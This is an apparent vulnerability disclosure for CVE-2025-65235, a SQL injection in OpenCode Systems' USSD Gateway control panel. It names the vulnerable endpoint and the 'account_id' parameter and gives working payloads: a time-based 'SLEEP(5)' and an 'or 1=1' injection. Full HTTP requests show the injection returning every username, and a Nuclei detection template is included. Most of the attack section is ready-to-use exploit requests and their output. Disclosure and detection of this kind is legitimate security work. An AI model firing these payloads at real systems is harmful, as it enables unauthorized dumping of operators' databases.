# \[CVE-2025-65235] USSD GW SQL Injection - SubUsers

## Description

SQL Injection in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands. \
<https://www.cve.org/CVERecord?id=CVE-2025-65235>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint**: `/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider`
* **Vulnerable Parameter**: `account_id`
* **Payload Sample:** `account_id=1; SELECT SLEEP(5)#`

## Exploitation

The default request is being used to get the username of the account details based on the account ID, the response is shown below

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1
```

```http
HTTP/2 200 OK
[...]


{"1" :"USERNAME" }
```

By appending the payload to the parameter, all the usernames will be shown in the response.&#x20;

> You can use different payloads, the below one was used as a POC&#x20;

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1\+or+1=1--+-
```

```http
HTTP/2 200 OK
[...]

{ 
	"1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5"
	[...] 
}
```

## Nuclei Template

You can use this template for easy detection.&#x20;

```yaml
id: ocpanel-ussdgw-sqli

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl
  severity: high
  description: |
    Time-based SQL injection test for the getSubUsersByProvider endpoint.
    Injects a SLEEP(5) payload into the account_id parameter and flags the
    target if the response time indicates the SQL sleep was executed.
  tags: [sqli, time-based, ocpanel]

requests:
  - id: time_inject
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "account_id=1; SELECT SLEEP(5)#"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

```